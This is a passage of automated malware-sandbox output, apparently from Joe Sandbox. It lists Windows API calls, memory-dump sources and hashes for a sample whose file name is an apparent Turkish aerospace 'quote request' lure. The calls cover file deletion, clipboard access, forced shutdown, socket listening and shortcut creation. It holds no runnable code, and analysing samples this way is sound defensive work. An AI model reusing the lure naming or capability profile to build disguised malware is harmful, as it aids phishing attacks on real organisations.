                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 001F96FA
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001F974A
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00246B7C), ref: 001F9768
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001F9772
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F977F
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F978F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                    • Opcode ID: 02c168bcab5d3dcdcf89278debfe7f7c3b4e3c203e27381f69565ff2b7238240
                                                                                                                                    • Instruction ID: 200fc311155e09c4064743d549cd3a13f1422dce1ab8462bc1749dc1335d4ce3
                                                                                                                                    • Opcode Fuzzy Hash: 02c168bcab5d3dcdcf89278debfe7f7c3b4e3c203e27381f69565ff2b7238240
                                                                                                                                    • Instruction Fuzzy Hash: 1531BF7654061D6BDB14BFB4EC0CBEE77AC9F1A321F208156FA15E20A0DB30D9448E54
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 001F97BE
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 001F9819
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F9824
                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 001F9840
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001F9890
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00246B7C), ref: 001F98AE
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001F98B8
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F98C5
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001F98D5
                                                                                                                                      • Part of subcall function 001EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001EDB00
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                    • Opcode ID: 169e9eac17367fc76f7047b18668076983179eb726ca147826dd89bb63ed4da4
                                                                                                                                    • Instruction ID: 86c9bb200e993ce8fe21576b8dd10586c7719e1b7fdcaf7188803033f7430d99
                                                                                                                                    • Opcode Fuzzy Hash: 169e9eac17367fc76f7047b18668076983179eb726ca147826dd89bb63ed4da4
                                                                                                                                    • Instruction Fuzzy Hash: 8D31E13554061D6ADB24BFB4EC48BEE37AC9F57360F2481A6FA10A2090DB30DE948A60
                                                                                                                                    APIs
                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 001F8257
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F8267
                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001F8273
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001F8310
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001F8324
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001F8356
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001F838C
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001F8395
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1464919966-438819550
                                                                                                                                    • Opcode ID: 4538957c4b3dddbc891c57a3946628fb512ff36f230be4c0dbb6d92db74e6c26
                                                                                                                                    • Instruction ID: 3faf6d9101fd670f78b4d7b0304539f6e3b9bdcb0261d9885f3bf554d4599f45
                                                                                                                                    • Opcode Fuzzy Hash: 4538957c4b3dddbc891c57a3946628fb512ff36f230be4c0dbb6d92db74e6c26
                                                                                                                                    • Instruction Fuzzy Hash: DD6189B65083099FCB10EF60D8449AEB3E8FF99314F04891DFA9987251DB31EA45CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2
                                                                                                                                      • Part of subcall function 001EE199: GetFileAttributesW.KERNEL32(?,001ECF95), ref: 001EE19A
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001ED122
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 001ED1DD
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001ED1F0
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 001ED20D
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001ED237
                                                                                                                                      • Part of subcall function 001ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,001ED21C,?,?), ref: 001ED2B2
                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 001ED253
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001ED264
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                    • Opcode ID: 797bed2bc2c7c86ca0a0b6ba2e55f7d0925e1d6273784b4db4007857a9610560
                                                                                                                                    • Instruction ID: fb95d6176ac639bafc28c54ddf8b61791f3003db680c4977abbd1151abe26c7c
                                                                                                                                    • Opcode Fuzzy Hash: 797bed2bc2c7c86ca0a0b6ba2e55f7d0925e1d6273784b4db4007857a9610560
                                                                                                                                    • Instruction Fuzzy Hash: BA61493180514EABCF05EBE1EA929FDB7B5AF25304F648165E40277191EB31AF09CF61
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                    • Opcode ID: ce61af117eadf08d0890c6e76e0d4387b62f469606b43b0318dfe5409b5f2506
                                                                                                                                    • Instruction ID: 83bcf60e571f1243245fd16f250c9ed0f0b60bd8eaa1632092c5a9da78c2f99d
                                                                                                                                    • Opcode Fuzzy Hash: ce61af117eadf08d0890c6e76e0d4387b62f469606b43b0318dfe5409b5f2506
                                                                                                                                    • Instruction Fuzzy Hash: 1D41CE35204651AFE320DF15E888B69BBE5FF54328F24C099E5158BA72CB35ED42CB90
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001E170D
                                                                                                                                      • Part of subcall function 001E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001E173A
                                                                                                                                      • Part of subcall function 001E16C3: GetLastError.KERNEL32 ref: 001E174A
                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 001EE932
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                    • Opcode ID: 8d5d9bb68e75577e1c14244a3544d0d357c759fcc448bd878a8ae4379c6e3209
                                                                                                                                    • Instruction ID: c6990d969b1bdae1de0dbef9d3f53d82fb5332901489d1305ba48e6da9e3adbd
                                                                                                                                    • Opcode Fuzzy Hash: 8d5d9bb68e75577e1c14244a3544d0d357c759fcc448bd878a8ae4379c6e3209
                                                                                                                                    • Instruction Fuzzy Hash: C1012B72610651BBEB1866B6AC89FFF72DC9724744F154421FC03E31D3DBA05C4485A0
                                                                                                                                    APIs
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00201276
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00201283
                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 002012BA
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 002012C5
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 002012F4
                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00201303
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 0020130D
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0020133C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 540024437-0
                                                                                                                                    • Opcode ID: 9459866fa6abe1495f5de7945fcd37cf42183aa69e0699c405bd16bd3dc41be1
                                                                                                                                    • Instruction ID: b657892dd15f846bc240d49b2719ccb2cbf8ca4f6c1228ba581f219f443446f1
                                                                                                                                    • Opcode Fuzzy Hash: 9459866fa6abe1495f5de7945fcd37cf42183aa69e0699c405bd16bd3dc41be1
                                                                                                                                    • Instruction Fuzzy Hash: 92419E356002119FD710DF68D4C8B69BBE5AF56318F288088E8568F2D7C771ED91CBE0
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 001BB9D4
                                                                                                                                    • _free.LIBCMT ref: 001BB9F8
                                                                                                                                    • _free.LIBCMT ref: 001BBB7F
                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00223700), ref: 001BBB91
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0025121C,000000FF,00000000,0000003F,00000000,?,?), ref: 001BBC09
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00251270,000000FF,?,0000003F,00000000,?), ref: 001BBC36
                                                                                                                                    • _free.LIBCMT ref: 001BBD4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                    • Opcode ID: 9d2bfdf1cafc0e01fef8fd2373865fdbdca8d95e882065b7af3503f7e80cd807
                                                                                                                                    • Instruction ID: 0fe0afadc500ded225db5901b2c80948955cdff72b09c8a00dbc6fb924608ad2
                                                                                                                                    • Opcode Fuzzy Hash: 9d2bfdf1cafc0e01fef8fd2373865fdbdca8d95e882065b7af3503f7e80cd807
                                                                                                                                    • Instruction Fuzzy Hash: 4DC11471908204AFCB24EF79DC95BEEBBA8EF51310F24419AE894D7651EBB08E41C750
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2
                                                                                                                                      • Part of subcall function 001EE199: GetFileAttributesW.KERNEL32(?,001ECF95), ref: 001EE19A
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001ED420
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 001ED470
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001ED481
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001ED498
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001ED4A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                    • Opcode ID: 58a005dbb04c9ebbed939a8acd89788b752142096add1c5f3aa2f16a6ef3b456
                                                                                                                                    • Instruction ID: 9bbb26ab26e3d2c79ea9c4f713418282316304ed236ebc720dfb0fdc3ac8f0c8
                                                                                                                                    • Opcode Fuzzy Hash: 58a005dbb04c9ebbed939a8acd89788b752142096add1c5f3aa2f16a6ef3b456
                                                                                                                                    • Instruction Fuzzy Hash: 13312D710087859BC305FF65E8958AFB7A8BFB6314F444A1DF8D592191EB30AA09CB63
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                    • Opcode ID: da72017c4e742426732803ec88bfd2b58abf8f49e0e0332277ff5dfe5cf5db69
                                                                                                                                    • Instruction ID: ae5e6d81bf044b7cb88a72d32ee1752148628a292a37d77ea5afb5406a1aa1ff
                                                                                                                                    • Opcode Fuzzy Hash: da72017c4e742426732803ec88bfd2b58abf8f49e0e0332277ff5dfe5cf5db69
                                                                                                                                    • Instruction Fuzzy Hash: 31C22971E086288FDB29CE28DD447EAB7F5EB49305F1541EAD84DE7241E774AE828F40
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 001F64DC
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 001F6639
                                                                                                                                    • CoCreateInstance.OLE32(0021FCF8,00000000,00000001,0021FB68,?), ref: 001F6650
                                                                                                                                    • CoUninitialize.OLE32 ref: 001F68D4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                    • Opcode ID: 6953a7180962c418b3e0516a3a3d2965e627cbc9acb18bbf5c92b1d3952167b9
                                                                                                                                    • Instruction ID: 863c39607d118833e4540074bf9d6add073512cd8b991ec9a3fda79017a343f5
                                                                                                                                    • Opcode Fuzzy Hash: 6953a7180962c418b3e0516a3a3d2965e627cbc9acb18bbf5c92b1d3952167b9
                                                                                                                                    • Instruction Fuzzy Hash: 78D15971508305AFC304EF24C89196BB7E8FFA9304F14496DF5959B2A1EB71EE05CBA2
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 002022E8
                                                                                                                                      • Part of subcall function 001FE4EC: GetWindowRect.USER32(?,?), ref: 001FE504
                                                                                                                                    • GetDesktopWindow.USER32 ref: 00202312
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00202319
                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00202355
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00202381
                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002023DF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                    • Opcode ID: 27f5a3de6397e8d2a8988cfa41896fd1e0641b64b7991b0d3c99cf93ed64df23
                                                                                                                                    • Instruction ID: 4ee3f98c5c2fe09e2bd9f30bf6b0aa54d9802eba562c7b290871795d021130a8
                                                                                                                                    • Opcode Fuzzy Hash: 27f5a3de6397e8d2a8988cfa41896fd1e0641b64b7991b0d3c99cf93ed64df23
                                                                                                                                    • Instruction Fuzzy Hash: E6310072504346AFD720DF14D808B9BBBEAFF94314F10491AF984A7182DB34EA18CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001F9B78
                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001F9C8B
                                                                                                                                      • Part of subcall function 001F3874: GetInputState.USER32 ref: 001F38CB
                                                                                                                                      • Part of subcall function 001F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F3966
                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001F9BA8
                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001F9C75
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1972594611-438819550
                                                                                                                                    • Opcode ID: 33547dd3fd4a011f2c6b99e823b6083f74cf5345670cf46d5f157429a4011221
                                                                                                                                    • Instruction ID: a779cf163c71ee7577eff00769306be1609b7fb3c81ea6e7cd3c54237fd4e9bf
                                                                                                                                    • Opcode Fuzzy Hash: 33547dd3fd4a011f2c6b99e823b6083f74cf5345670cf46d5f157429a4011221
